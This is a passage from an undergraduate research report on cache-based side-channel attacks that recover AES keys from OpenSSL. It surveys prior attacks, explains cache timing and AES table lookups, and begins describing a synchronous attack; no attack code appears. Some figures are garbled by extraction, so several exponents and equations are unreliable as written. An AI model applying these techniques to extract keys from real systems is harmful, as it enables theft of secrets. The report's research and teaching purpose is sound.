Cache Based Side Channel Attacks On AESrgiri8/files/RPG_BTP.pdf"Cache Based Side Channel Attacks on...

Cache Based Side Channel Attacks On AES

A Major Project Report

Submitted in partial fulfillment for the Award of

BACHELOR OF TECHNOLOGY

IN

COMPUTER SCIENCE AND ENGINEERING

By

Ravi Prakash Giri

2011ECS32

To

SHRI MATA VAISHNO DEVI UNIVERSITY,

J&K, INDIA

MAY, 2015

ii

Certificate

This is to certify that I, Ravi Prakash Giri ( 2011ECS32 ) have worked under the

guidance of Mrs. Sonika Gupta on the project titled ”Cache Based Side Channel

Attacks On AES” in the School of Computer Science & Engineering, College of

Engineering, Shri Mata Vaishno Devi University, Kakryal, Jammu & Kashmir from

2nd Jan 2015 to 17th May 2015 for the award of Bachelor of Technology in

Computer Science & Engineering.

The contents of this project, in full or in parts, have not been submitted to any

other Institute or University for the award of any degree or diploma.

Student’s Signature

Student’s Name

This is to certify that the above student has worked for the project titled

”Cache Based Side Channel Attacks on AES” under my supervision.

Signature:

Guide Name: Mrs. Sonika Gupta

iv

Acknowledgement

I would like to express my sincere gratitude to Prof. Bernard L. Menezes, IIT-

Bombay for his constant motivation, useful suggestions and words of wisdom. He has

been my primary source of guidance during my entire project. I would like to extend

my gratitude towards my internal guide Mrs. Sonika Gupta for her guidance and

for providing necessary information regarding the project. I am extremely grateful

for the opportunity to work on this project in a team comprising Bholanath Roy,

Vibhor Agrawal, Ashokkumar C under the supervision of Prof. Bernard Menezes

at IIT-Bombay. A summery of this work has been submitted recently in a paper

titled ” Design and Implementation of an Espionage Network for Cache based Side

Channel Attacks on AES ” to an international conference.

v

Abstract

Side channel attacks exploit information gained from physical implementation

or design rather than mathematical weaknesses of the cryptographic systems . We

have extended and modified the existing work in the field of cache-based side channel

attacks targeting the software implementation of Advanced Encryption Standard

(AES) by designing and implementing the espionage network. Our model includes

a spy controller, ring of spy threads and an analytical operator all hosted on a

single server. A collaborative execution of spy controller and spy ring restrict the

victim process to access very few cache memory lines where the lookup tables reside.

Our results indicate that our setup can deduce the encryption key in fewer than 30

encryptions and with far fewer victim interruptions compared to previous work.

Moreover, this approach can be adapted to work on various OS platforms and on

different versions of OpenSSL.

vi

List of Figures

3.1 Access based cache attack[3] . . . . . . . . . . . . . . . . . . . . . . . 9

5.1 SubBytes() Transformation[2] . . . . . . . . . . . . . . . . . . . . . 14

5.2 ShiftRows() Transformation[2] . . . . . . . . . . . . . . . . . . . . . 15

5.3 MixColumns() Transformation[2] . . . . . . . . . . . . . . . . . . . . 15

5.4 AddRoundKey() Transformation . . . . . . . . . . . . . . . . . . . . . 16

6.1 Evict-Time & Prime-probe . . . . . . . . . . . . . . . . . . . . . . . . 21

6.2 Graph showing cache sets with high Access Time . . . . . . . . . . . 22

6.3 Equations for second round attack . . . . . . . . . . . . . . . . . . . . 24

7.1 Functioning of the Completely Fair Scheduler.[11] . . . . . . . . . . . 26

7.2 Denial Of Service attack on CFS.[11] . . . . . . . . . . . . . . . . . . 27

8.1 Flush - reload attack timings [18] . . . . . . . . . . . . . . . . . . . . 30

8.2 Code for the Flush+Reload Technique [18] . . . . . . . . . . . . . . . 31

8.3 The Espionage Network. . . . . . . . . . . . . . . . . . . . . . . . . . 32

8.4 Timeline of victim and spy threads. . . . . . . . . . . . . . . . . . . . 32

8.5 Frequency Vs Cache Access Time(ticks). . . . . . . . . . . . . . . . . 34

10.1 #Accesses per run(#spy threads=10). . . . . . . . . . . . . . . . . . 45

10.2 #Accesses per run(#spy threads=40). . . . . . . . . . . . . . . . . . 45

10.3 Cache accesses detected by Spy threads. . . . . . . . . . . . . . . . . 46

10.4 Differences in the peak for 1100 accesses . . . . . . . . . . . . . . . . 48

10.5 Differences in the peak for 1300 encryptions . . . . . . . . . . . . . . 49

10.6 Encryptions required (Perfectly Synch. . . . . . . . . . . . . . . . . . 49

10.7 Encryptions required(synch. from last table accesses). . . . . . . . . 50

10.8 Encryptions required for second round attack(prefetching disbaled). 51

10.9 Encryptions required for second round attack(prefetching enabled. . 51

11.1 Intel MSR Prefetcher. . . . . . . . . . . . . . . . . . . . . . . . . . . 54

vii

List of Tables

4.1 Steps in calculating a50 . . . . . . . . . . . . . . . . . . . . . . . . . . 11

10.1 Conflicting access resolution . . . . . . . . . . . . . . . . . . . . . . . 47

viii

Contents

Acknowledgement iv

Abstract v

List of Figures vi

List of Tables vii

1 Introduction 1

1.1 Purpose . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2

1.2 Problem Statement . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2

1.2.1 Motivation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2

1.2.2 Goals . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3

1.3 Report Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3

2 Related Work 4

3 Preliminaries 6

3.1 Basics of Cache working . . . . . . . . . . . . . . . . . . . . . . . . . 6

3.2 Cache based Side Channel Attacks . . . . . . . . . . . . . . . . . . . 7

3.3 Types of Cache based side channel attacks . . . . . . . . . . . . . . . 8

3.3.1 Time driven . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8

3.3.2 Trace driven . . . . . . . . . . . . . . . . . . . . . . . . . . . 8

3.3.3 Access driven . . . . . . . . . . . . . . . . . . . . . . . . . . . 9

4 Cache Attacks in Cryptographic Algorithms 10

4.1 Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10

4.1.1 Cache attacks in secret key cryptography . . . . . . . . . . . . 10

4.1.2 Cache attacks in public key cryptography . . . . . . . . . . . . 11

5 Advanced Encryption Standard 12

5.1 Description of the Cipher . . . . . . . . . . . . . . . . . . . . . . . . . 12

ix

5.2 AES Algorithm . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13

5.2.1 Key Expansions . . . . . . . . . . . . . . . . . . . . . . . . . . 13

5.2.2 Initial Round . . . . . . . . . . . . . . . . . . . . . . . . . . . 13

5.2.3 Rounds . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13

5.2.4 Final Round . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15

5.3 AES Implementation . . . . . . . . . . . . . . . . . . . . . . . . . . . 16

5.3.1 Round Transformations . . . . . . . . . . . . . . . . . . . . . 16

5.3.2 Last Round Implementation . . . . . . . . . . . . . . . . . . . 18

6 Cache attacks on Non-shared table 19

6.1 Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19

6.2 Cache access measurement . . . . . . . . . . . . . . . . . . . . . . . . 20

6.3 First Round Attack . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22

6.4 Second Round Attack . . . . . . . . . . . . . . . . . . . . . . . . . . . 24

7 Cache attacks by exploiting CFS 25

7.1 Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25

7.2 Completely Fair Scheduler . . . . . . . . . . . . . . . . . . . . . . . . 25

7.3 Attacking CFS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26

7.4 Retrieving Key . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27

8 Design & Implementation of Espionage Infrastructure 29

8.1 Flush+Reload Technique . . . . . . . . . . . . . . . . . . . . . . . . . 29

8.2 Our espionage infrastructure . . . . . . . . . . . . . . . . . . . . . . . 31

8.3 Approach for Attack . . . . . . . . . . . . . . . . . . . . . . . . . . . 35

8.3.1 Algorithm . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35

9 Coding 36

9.1 Experimental Setup . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36

9.2 Attacker source code . . . . . . . . . . . . . . . . . . . . . . . . . . . 36

10 Results and Analysis 44

11 Countermeasures 53

11.1 Pre-fetching . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 53

11.1.1 Issues . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 54

11.1.2 Workaround . . . . . . . . . . . . . . . . . . . . . . . . . . . . 55

11.2 Look-up tables Misalignment . . . . . . . . . . . . . . . . . . . . . . . 56

11.3 Synchronization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 56

1

Chapter 1

Introduction

With the increasing popularity of internet as a communication as well as data stor-

age medium, demand for securing the confidential data from unauthorized access

has increased a lot during the last decade. Cryptographic schemes that prevent

confidential data to be accessed by unauthorized users have become increasingly im-

portant.More and more cryptographic schemes can be seen floating around. Before

being deployed in practice, such schemes typically have to pass a rigorous reviewing

process to eliminate design weaknesses. However, just ensuring theoretical sound-

ness such schemes does not ensure concrete security of its physical implementation.

Side-channel cryptanalysis is any attack on a cryptosystem requiring information

emitted as a byproduct of the physical implementation. Side channel attacks are

an important class of implementation level attacks on cryptographic systems that

exploits leakage of information through data-dependent characteristics of physical

implementations such as electromagnetic radiation, power consumption of device,

running time of certain operations, etc. and, typically, are specific to the actual

implementation of the algorithm. Side channel attacks utilize the fact that in re-

ality, a cipher is not a pure mathematical function Ek[P ] → C, but a function

Ek[P ] → (C, t), where t is any additional information produced by the physical

implementation[13]. An important class of timing attacks are those based on ob-

taining measurements from cache memory systems.

General classes of side channel attack include:

Timing-Attack is based on measuring how much time various computations

take to perform. Power-monitoring attacks are the those that make use of vary-

ing power consumption by the hardware during computation. Electromagnetic

Attacks are based on leaked electromagnetic radiation, which can directly provide

plaintexts and other information. Such measurements can be used to infer crypto-

graphic keys using techniques equivalent to those in power analysis or can be used

2

in non-cryptographic attacks, e.g. TEMPEST (aka van Eck phreaking or radiation

monitoring) attacks. Acoustic cryptanalysis and Differential fault analysis

attacks exploit sound produced during a computation (rather like power analysis).

Row Hammer are another kind of side channel attacks in which off-limits memory

can be changed by accessing adjacent memory.

The Advanced Encryption Standard (AES)[6] is a relatively new algorithm for

secret key cryptography, is now universally supported on servers, browsers, etc.

Software implementations of AES including OpenSSL, make extensive use of table

lookups in lieu of time-consuming mathematical field operations[6]. Cache-based

side channel attacks take advantage of the fact that access times to different levels

of the memory hierarchy are different and hence it can retrieve the key of a victim

performing AES.

1.1 Purpose

The purpose of our experiment is to design and implement an efficient cache based

side channel attacks on Advanced Encryption Standard - the de facto standard of

secret key cryptography. In last 10 years, various attacks on AES has been reported

with some complications. So the main purpose of our experiment is to develop

a much easier attack that require very less Victim interruptions and encryptions

in comparison to any previous works and can be incorporated on today’s modern

processors like core i-5 and core i-7.

1.2 Problem Statement

1.2.1 Motivation

Among many side channel attacks available, the reason we are particularly interested

in cache as side channel attacks is that caches form a shared resource for which all

processes compete, and it thus is affected by every process. While the data stored

in the cache is protected by virtual memory mechanisms, the metadata about the

contents of the cache, and in particular the memory access patterns of processes

using that cache, are not fully protected.

Thus, cache provides an easy to access medium, which attacker can spy on, in a

concealed manner.

3

1.2.2 Goals

• To design and implement an espionage network with associated analytic ca-

pabilities that retrieve the AES key using fewer encryptions and also fewer

interruptions to the victim process.

• To demonstrate a complete attack on OpenSSL implementation of AES. Fur-

ther to reduce the time quantum provided to the victim process to an extent

useful for our attack.

• To understand how shared as well as non-shared AES tables both can be

exploited using cache.

1.3 Report Overview

This document is a brief report on how cache can be exploited as side channel attack.

To start with, the report briefly describes how cache works and how it can be used

as a medium for spying and gathering information, which otherwise is meant to be

secret.

Chapter 2 of this report describes the related work done in this field. Chapter

3 describes the preliminaries of Side Channel Attacks and cache working. Chapter

4 gives a wide idea about how cache can be used in both public key cryptography

and secret key cryptography as medium for attacker. The report majorly comprises

of attack on AES, so chapter 5 explains AES algorithm and how it is implemented.

We will be focusing on this algorithm only, to perform our attack. In chapter 6 and

chapter 7 we will go through the techniques to exploit AES in shared as well as

non-shared scenario. The next chapter deals with the design and implementation

of our espionage infrastructure for the attack. In the following chapters, we will

analyse the results of our attack and discuss the countermeasures.

4

Chapter 2

Related Work

The first consideration of cache memory as a covert channel to extract sensitive in-

formation was mentioned by Hu[12]. In April 2005, the software implementations of

AES was exploited and reported by Bernstein. D.J. Bernstein announced a cache-

timing attack that he used to break a custom server that used OpenSSL’s AES

encryption[5]. The attack required over 200 million chosen plaintexts on Pentium-

III machine. The custom server was designed to give out as much timing information

as possible (the server reports back the number of machine cycles taken by the en-

cryption operation). Although their attack is generic and portable, it needs 227.5

encryptions and sample timing measurements with known key in an identical con-

figuration of target server.

In 2003, Tsunoo et al.[17] demonstrated time driven cache attack on DES. They

focused on overall hit ratio during encryption and performed attack by exploiting the

correlation between cache hits and encryption time. A similar approach was used

by Bonneau et al., where they emphasized individual cache collisions during encryp-

tion instead of overall hit ratio[13]. Although Bonneau’s attack was a considerable

improvement over previous work, it still requires 213 timing samples.

In October 2005, Dag Arne Osvik, Adi Shamir and Eran Tromer presented a

paper[16] demonstrating several cache-timing attacks against AES. One attack was

able to obtain an entire AES key after only 800 operations triggering encryptions,

in a total of 65 milliseconds. This attack requires the attacker to be able to run

programs on the same system or platform that is performing AES.

A major contribution in access-driven cache attacks appeared in Tromer et al.

paper presented in 2010[7]. They performed both synchronous and asynchronous

attacks. In synchronous attack, 300 encryptions were required to recover 128 bit

AES key on Athlon64 system and in asynchronous attack, 45.7 bits of information

about key was retrieved effectively. They introduced the Prime + Probe technique

5

to perform an access-driven attack. In prime phase, attacker fills cache with its own

data before encryption begins. During encryption, victim evicts some of attacker’s

data from cache in order to load lookup table entries. In probe phase, attacker

calculates reloading time of its data and finds cache misses corresponding to those

lines where victim loaded lookup table entries. Both the attacker and victim must

execute on the same core of the processor to make the attack successful.

The ability to detect whether a cache line has been evicted or not, was further

exploited by Neve et al in 2007[14]. Advancing in the mainstream of asynchronous

attacks, they performed improved access-driven cache attack on last round of AES

to recover 128 bit key with 20 encryptions. However, this attack was feasible only

on single-threaded processors and the practicality of their attack implementation

was not clear due to insufficient system and OS kernel version details.

Gullasch et al. proposed an efficient access driven cache attack[11] when attacker

and victim use a shared crypto library. The spy process first flushes the memory lines

corresponding to entire lookup table entries from all levels of cache and interrupts

victim process after allowing it single lookup table access. After every interrupt,

by calculating reload time it finds which memory line is accessed by victim. This

information is further processed using neural network to remove noise in order to

retrieve the AES key.

Wei et al. used Bernstein’s timing attack on AES running inside an ARM

Cortex-A8 single core system in a virtualized environment to extract AES encryp-

tion key[15]. Apecechea et al. in 2014 performed Bernstein’s cache based timing

attack in a virtualized environment (Xen and VMware VMMs) to recover AES se-

cret key[10] from co-resident VM with 229 encryptions. Later they improved it in

Irazoqui et al. paper[8] using Flush + Reload technique and recover AES secret key

with 219 encryptions.

We are improving over prior works performed in last decade by providing a first

practical access-driven attack on AES algorithm. Our attack will be working in much

weaker assumptions and very less Victim interruptions than any attacks discussed

so far. Moreover, it is very efficient as it require only 25 encryptions to retrive the

complete AES key.

6

Chapter 3

Preliminaries

3.1 Basics of Cache working

Cache is placed between RAM (main memory) and CPU. The instructions and data,

before reaching CPU from memory gets stored in cache and are accessed from there.

Cache is a component that stores data so future requests for that data can be served

faster; the data stored in a cache might be the results of an earlier computation,

or the duplicates of data stored elsewhere. A cache hit occurs when the requested

data can be found in a cache, while a cache miss occurs when it cannot. When

a cache miss occurs, the CPU retrives the data from the main memory and stores

it in to the cache. This action is motivated by the temporal locality principle:

recently accessed data is likely to be accessed again. Cache hits are served by reading

data from the cache, which is faster than recomputing a result or reading from a

slower data store; thus, the more requests can be served from the cache, the faster

the system performs.

However, the CPU is going to take advantage of spatial locality as well:

when a data is accessed,the values stored close to the accessed data is likely to be

accessed again. Hence, when a cache miss occur, it not only load that data but

loads the whole cache line that includes the data nearby. The cache line represents

the partitions of the data that can be written or retrived at a time.

To understand this problem in more detail, lets us assume we have a n-way set

associative cache memory, where each address can be mapped to n different cache

blocks. Cache contains 2a cache sets each containing n cache lines and each line in

turn contains 2b bytes of data. To locate a cache line holding data from memory

address A, least significant b bits are ignored as cache line size is 2b bytes. Next

a bits denotes the cache set and remaining bits are tag field for verification of the

correct entry. Data can go into any line within a specific set.

7

This granularity level is determined by some predetermined cache replacement

policy. In general Least Recently Used page replacement policy is used.

3.2 Cache based Side Channel Attacks

Previously side channel attacks were used to break specialized systems such as smart

cards etc. Now a days major focus is on side channel attacks that exploit the shared

resources in conventional microprocessors. Such attacks are very powerful because

they do not require the attackers physical presence to observe the side-channel and

can therefore be launched remotely using only non-privileged operations.

Cache-based side-channel attacks represent an example of this class of attacks.

In this, attacker process monitors the cache activity performed the victim cipher

process. If carefully designed, such attacks can leak enough information about the

secret key. Cache-based side-channel attacks are based on the fact that if CPU

accesses data from memory, and that data is not available in cache, it experiences a

delay pertaining to cache miss and this delay is significant enough to be measured

from the situation where data is present in cache and accessed. Victim can thus find

out the occurrence and frequency of cache misses.

The runt-time of the fast software based ciphers like AES heavily depends on

the speed at which table look ups are performed. A popular style of implementation

of the AES is its T-table implementation[6]. It combines all four major operations

that is being performed throughout the encryptions into one single table look up

per state byte along xor operations. The index of the loaded entry is determined

by a byte of the cipher state. Therefore the information on which table values have

been loaded into cache can reveal information about the secret state of AES.

In any side channel attack, there are essentially two phases:

1. Online phase where side channel information is gained using repeated en-

cryption/decryption. Here, attacker measures and tabulates the side channel

information (timing, power consumption etc) as per the attack method.

2. Offline phase where the data from Online phase is used to generate results and

graphs which helps in prediction and verification of observations regarding the

secret value of the cipher. In many cases, we can actively utilize analysis from

this phase to carry out encryption and decryption in Online phase.

8

3.3 Types of Cache based side channel attacks

3.3.1 Time driven

In time-driven attacks[5], attacker can observe the aggregated profile of an encryp-

tion or decryption, i.e. total execution time taken by the cipher process to complete

that encryption or decryption. Attacker thus correlates the time taken by cipher

process to the number of cache misses occurring during that encryption. More the

number of cache misses more the execution time. This attack relies on the accurate

measurement of timing of the encryption and execute the timing code synchronously

before and after an encryption round.

As this attack is based on overall execution time, there can be other factors (other

processes running simultaneously with victim) affecting the victim process, we need

a large number of sample in offline phase to accurately measure the information

about secret key. Being sad, this type of attack is very easy to carry out and

requires minimal coding in online phase for gathering information required. To find

out the relationship between timing information and key values, attacker can make

statistical algorithm-specific inferences about the state during processing.

For example, it might be inferred that in encryption with large number of misses,

certain key related variable are not equal as they access different parts of memory

causing cache misses, while in lesser number of misses, they are equal. With such

kind of observations, attacker can relate plain-text to cipher key and hence unravel

the key bits.

3.3.2 Trace driven

In Trace-driven attacks[3], attacker is able to capture the profile of cache activity

during encryption, up to the granularity of individual memory accesses. In this type

of attack, the attacker can figure out the outcome of every memory access (trace)

the cipher process issues in terms of hits and misses.

Trace can be defined as sequence of cache hits and misses. For example: HMMM,

MMMH, HHMM, HMHM is a valid trace, where H represents hit and M represent

cache miss. The attacker can observe if a particular memory access to a lookup table

yield a hit or miss, thus can infer information about the lookup indices. As these

indices are key dependent in almost all cases, secret information can be revealed.

This type of information can be calculated using simple power analysis of the

target process. As the power consumption of a microprocessor is dependent on

the instruction being executed and on data being manipulated, the attacker can

therefore observe the difference in power consumption when cache miss routine is

9

being carried out by the victim.

3.3.3 Access driven

These are most recent of all three and most powerful amongst them. In this the

attacker and victim process shares the cache memory, and secret information is

leaked using the cache as side channel medium. Here the attacker can determine

information up to the granularity of the cache sets modified by the victim process.

Thus, attacker can determine the elements of lookup table accessed by the cipher.

Figure 3.1: Access based cache attack[3]

The whole process can be summarized as below. In such attacks, the two pro-

cesses are executing on the same machine, thus sharing the data cache. Victim

process during encryption requests for data residing in memory causing either cache

hit or miss. Attacker spies this cache activity of the victim process. It, using the

techniques discussed in section X, measures the cache set being accessed.

Among all three techniques, this is the most powerful technique and can give

most information to the attacker. However, gathering such information from the

system under scrutiny is quite complex.

10

Chapter 4

Cache Attacks in Cryptographic

Algorithms

4.1 Introduction

Cache based Side Channel Attacks are applicable to both Secret key as well as public

key encryption schemes. The next two sub-sections briefly describes how it can be

used to attack both the scenarios.

4.1.1 Cache attacks in secret key cryptography

The basic principle of cache based Side channel attack is the difference in access

time of data in case of cache hit vs cache miss.

Secret key cryptography, like AES, DES works on the principle of simple math-

ematical operations which are repeated again and again to get better encrypted

outcome. Like in AES each encryption consists of almost identical 10 rounds with

each round is a combination of 4 simple mathematical/logic operations.

These operations due to their simple nature can easily be realized in the form

of tables/arrays where intermediate data is stored in them and simply accessed

as and when needed. This step greatly reduces the time required to perform the

operations as all the four operations of a round are simply reduced to a few table

accesses.

However, this poses another problem in the form of side channel attack. These

access tables are now stored in cache and the encryption algorithm uses some com-

bination of key bits to access the particular element of the key. If the attacker

somehow, figures out some information about the location access by the encryption

algorithm, he/she can directly relate the same to find out the key bits.

11

4.1.2 Cache attacks in public key cryptography

Public key cryptography on the other hand is based on heavy mathematical opera-

tions (in the order of 100’s of bits of numbers). For example, in RSA encryption of

a message, we need to calculate (mp mod n), where p is a large number of the order

of 1000’s of bit.

Due to such huge complexity involved, they, unlike secret key cryptography can-

not be pre-computed and stored in table. Due to this, these operations takes too

much time as compared to secret key counterparts. As there are no tables involved,

we cannot apply the same principle as that in AES to attack such schemes.

However, we can observe that while performing such operations (modular expo-

nentiation, etc), we take different paths based on the secret bits. As an example, I

want to perform operation a50 for some ’a’.

Writing 50 in binary notation: 110010.

Now, starting with result = 1, and moving right bit by bit from left side (MSb)

in exponent,

For every bit 1, we first square the result and multiply with a.

For every bit 0, we simple square the result.

The steps to get the result[4]:

Bit position considered Result (Initial Value = 1)110010 (12) ∗ a = a110010 (a2) ∗ a = a3

110010 (a3)2 = a6

110010 (a6)2 = a12

110010 ((a12)2 ∗ a = a25

110010 (a25)2 = a50

Table 4.1: Steps in calculating a50

We can clearly see that different operations are performed based on different bit

values. This is the basis of side channel attacks in public Key scenario. These func-

tions will be loaded into the memory and thus will map to some cache location(s).

Let’s assume, square function is mapped at line x and multiply function at line y.

Attacker, instead of spying on the data cache will now look for instruction cache, and

will try to figure out at each step, whether multiplication is performed or squaring

by continuously looking at both lines x and y each time. Once, the attacker get the

ordering of such squaring or multiplication operations, he/she can simply get the

unknown secret exponent easily.

12

Chapter 5

Advanced Encryption Standard

5.1 Description of the Cipher

AES is based on a design principle known as a substitution-permutation network,

combination of both substitution and permutation, and is fast in both software and

hardware. Unlike its predecessor DES, AES does not use a Feistel network. AES is

a variant of Rijndael which has a fixed block size of 128 bits, and a key size of 128,

192, or 256 bits.

Let us briefly take a look at how AES works and how AES tables are computed

and used. AES operates on 4 X 4 column major order matrix of bytes, processing

16 Bytes at a time. The key size determines the number of repetitions of the

transformation rounds, that converts input into intermediary output, which at the

end of last round becomes the cipher text.

Number of rounds are:

1. 10 Rounds for Key size of 128 bits



Each round consists of several processing steps, each containing four similar but

different stages, including one that depends on the encryption key itself. A set of

reverse rounds are applied to transform ciphertext back into the original plaintext

using the same encryption key.

13

5.2 AES Algorithm

The Algorithm consists of four main parts:

1. Key Expansions: Generating round keys for each round using Rijndael’s key

schedule algorithm. AES requires a separate 128-bit round key block for each

round plus one more.

2. Initial Round: Each byte of the state is combined with a block of the round

key using bitwise xor.

3. Rounds:

• Sub Bytes

• Shift Rows

• Mix Columns

• Add round Key

4. Final Round:

• Sub Bytes

• Shift Rows

• Add round Key

5.2.1 Key Expansions

AES uses Rinjdael key schedule[6] to compute a seperate round key for each round

from the initial key. It uses Rinjdael S-box in the process. Algorithm 1 below is self

explanatory algorithm for the same.

Let w[0] ... w[3] be initialized with original AES key, where w[i] is 4 byte word.

5.2.2 Initial Round

Before starting the first round, each byte of plaintext is combined with corresponding

Byte of Initial 128 bits of Key using bitwise XOR operation.

5.2.3 Rounds

Each round except the last round, performs the four undermentioned steps:

14

Algorithm 1 Rinjdael key schedule

1: procedure KeySchedule2: for i = 4 to 43 do3: x← w[i− 1]4: if (i is a multiple of 4) then5: x← f(x)6: end if7: w[i]← w[i− 4]⊕ x8: end for9: end procedure

1. SubBytes() Transformation : In this step, each byte in the state matrix

is replaced with another according to a lookup table called the Rijndael S-

Box (substitution box). This step provides nonlinearity in the cipher. The

S-box used is derived from the multiplicative inverse over GF(28), known to

have good non-linearity properties. It is a fixed known-to-everyone table. The

secrecy is present in the key and not in the algorithm.

Figure 5.1: SubBytes() Transformation[2]

2. ShiftRows() Transformation : In ShiftRow, the rows of the State are cycli-

cally shifted over different offsets. Row 0 is not shifted, Row 1 is shifted over

C1 bytes, row 2 over C2 bytes and row 3 over C3 bytes. The shift offsets C1,

C2 and C3 depend on the block length. The operation of shifting the rows of

the State over the specified offsets is denoted by:

ShiftRow(State).

3. MixColumns() Transformation : Multiplication of each column by a con-

stant 4x4 matrix over the field GF (28). In this step, a mixing operation is

operated on the four bytes of each column. The MixColumns function takes

four bytes as input and outputs four bytes, where each input byte affects all

15

Figure 5.2: ShiftRows() Transformation[2]

four output bytes. This provides diffusion to the cipher which ensures that

modification of individual bits in the plaintext gets redistributed non-uniformly

in the ciphertext.

Figure 5.3: MixColumns() Transformation[2]

4. AddRoundKey() Transformation : In this operation, a Round Key is applied

to the State by a simple bitwise EXOR. The Round Key is derived from the

Cipher Key by means of the key schedule. The Round Key length is equal to

the block length. The transformation that consists of EXORing a Round Key

to the State is denoted by:

AddRoundKey(State,RoundKey)

The transformation is illustrated in Figure5.4.

5.2.4 Final Round

The MixColumns operation is omitted in the last round, and an additional Ad-

dRoundKey operation is performed before the first round (using a whitening key).

16

Figure 5.4: AddRoundKey() Transformation

5.3 AES Implementation

5.3.1 Round Transformations

The different steps of the round transformation can be combined in a single set of

table lookups, allowing for very fast implementations on processors with word length

32 or above. In this section, it is explained how this can be done. One column of

the round output e is expressed in terms of bytes of the round input a. Here, ai,jdenotes the byte of a in row i and column j, aj denotes the column j of State a.

For the key addition and the MixColumn transformation, we have :

For the ShiftRow and the ByteSub transformations, we have :

In all expression the column indices must be taken modulo block size which is 4 in

this case. By substitution, the above expressions can be combined into:

The matrix multiplication can be expressed as a linear combination of vectors:

The multiplication factors S[ai,j] of the four vectors are obtained by performing

17

a table lookup on input bytes ai,j in the S-box table S[256].

We define tables T0 to T3 :

These are 4 tables with 256 4-byte word entries and make up for 4 KByte of total

space. Using these tables, the round transformation can be expressed as:

ej = T0[x0,j]⊕ T1[x1,j+1]⊕ T2[x2,j+2]⊕ T3[x3,j+3]⊕ kj

Hence, a table-lookup implementation with 4 KB of tables takes only 4 table lookups

and 4 EXORs per column per round. Each table is accessed by using an 8 bit index

and gives 32 bits of output.

There is a separate key setup phase where a given 16-byte secret key k = (k0 ,

. . , k15) is expanded into 10 round keys, K(r) for r = 1, . . . , 10. Each round

key is divided into 4 words of 4 bytes each: K(r) = (K(r)0 , K

(r)1 , K

(r)2 , K

(r)3 ). The 0th

round key is just the raw key: K(0)j = (k4j, k4j+1, k4j+2, k4j+3 ) for j = 0, 1, 2, 3.

18

Given a 16-byte plaintext p = (p0 , . . , p15), encryption proceeds by comput-

ing a 16-byte intermediate state x(r) = (x0 , . . . , x15 ) at each round r . The

initial state x(0) is computed by x(0)i = pi ⊕ ki for (i = 0, . . . , 15). Then, the first

9 rounds are computed by updating the intermediate state as follows[16], for r = 0,

. . . , 8:

(x(r+1)0 , x

(r+1)1 , x

(r+1)2 , x

(r+1)3 )← T0[x

(r)0 ]⊕ T1[x(r)5 ]⊕ T2[x(r)10 ]⊕ T3[x(r)15 ]⊕K(r+1)

0

(x(r+1)4 , x

(r+1)5 , x

(r+1)6 , x

(r+1)7 )← T0[x

(r)4 ]⊕ T1[x(r)9 ]⊕ T2[x(r)14 ]⊕ T3[x(r)3 ]⊕K(r+1)

1

(x(r+1)8 , x

(r+1)9 , x

(r+1)10 , x

(r+1)11 )← T0[x

(r)8 ]⊕ T1[x(r)13 ]⊕ T2[x(r)2 ]⊕ T3[x(r)7 ]⊕K(r+1)

2

(x(r+1)12 , x

(r+1)13 , x

(r+1)14 , x

(r+1)15 )← T0[x12

(r)]⊕ T1[x(r)1 ]⊕ T2[x(r)6 ]⊕ T3[x(r)11 ]⊕K(r+1)3

Finally, to compute the last round above equation is repeated with r = 9, except

that T0, ..., T3 is replaced by T(10)0 , ..., T

(10)3 . The resulting x(10) is the ciphertext. the

change of lookup tables in the last round is due to the absence of MixColumn trans-

formation. Compared to the algebraic formulation of AES, here the lookup tables

represent the combination of ShiftRows, MixColumns and SubBytes operations; the

change of lookup tables in the last round is due to the absence of MixColumns.

5.3.2 Last Round Implementation

Last round can be implemented in multiple ways:

• Using additional table : Here, a seperate table of size 1KB is used. The

entries in this table are simply substituted index concatenated 4 times one

after the other.

• Using previous tables : In this case, some tables which are used in the

previous rounds can be used.

19

Chapter 6

Cache attacks on Non-shared table

6.1 Overview

Synchronous attacks is applicable in scenarios where the plaintext or ciphertext is

known and the attacker can operate synchronously with the program performing

AES encryption on the same processor, by using some interface that triggers en-

cryption under an unknown key. The main target of the attacker is to gather the

table accesses to as much fine granularity as possible.

If we consider a case, where attacker at each instant is able to say that this par-

ticular table access was made by victim process, calculating the secret key will be

trivial. In such a scenario, attacker will simply do an xor operation with the table

access from first intermediate round, and will get the whole key straight away, be-

cause for first round table accesses are simply plain-text byte ⊕ed with corresponding

key byte.

xi = pi ⊕ ki

Knowing the table access exactly means getting xi value. So, simply do an XOR

with the pi to get the ki.

However, this task of getting the table access is not so simple and straightforward,

neither can we achieve this granularity of table access.

As we know that each table entry occupies 4 Byte and assuming cache block size

is standard 64 Byte, 16 table entries will go into one cache block. This cache block

is the minimum amount of data being brought from memory into the cache. So,

even if the victim process has accessed one entry, whole 16 entries corresponding to

that cache block is brought into the memory.

Attacker cannot thus figure out the exact table access. He/she can thus only be

able to find out the cache block which is being accessed by the victim process.

20

To find this information, we need to consider two scenarios.

1. Non-shared table data : Here, cache is shared, i.e. both the processes are

using the same cache, but AES tables are not shared. So, at the start, attacker

don’t even know where the AES tables are in the cache.

2. Shared table data : Here, both the processes have access to same AES table

in the cache. Attacker now has the information of the location of AES tables in

the memory, thus he knows the cache lines to which the tables are mapped. We

are targeting OpenSSL implementations of AES, which by default is shared,

so this scenario is also quite realistic.

In the subsequent sections we will look at the approaches to mount the attack in

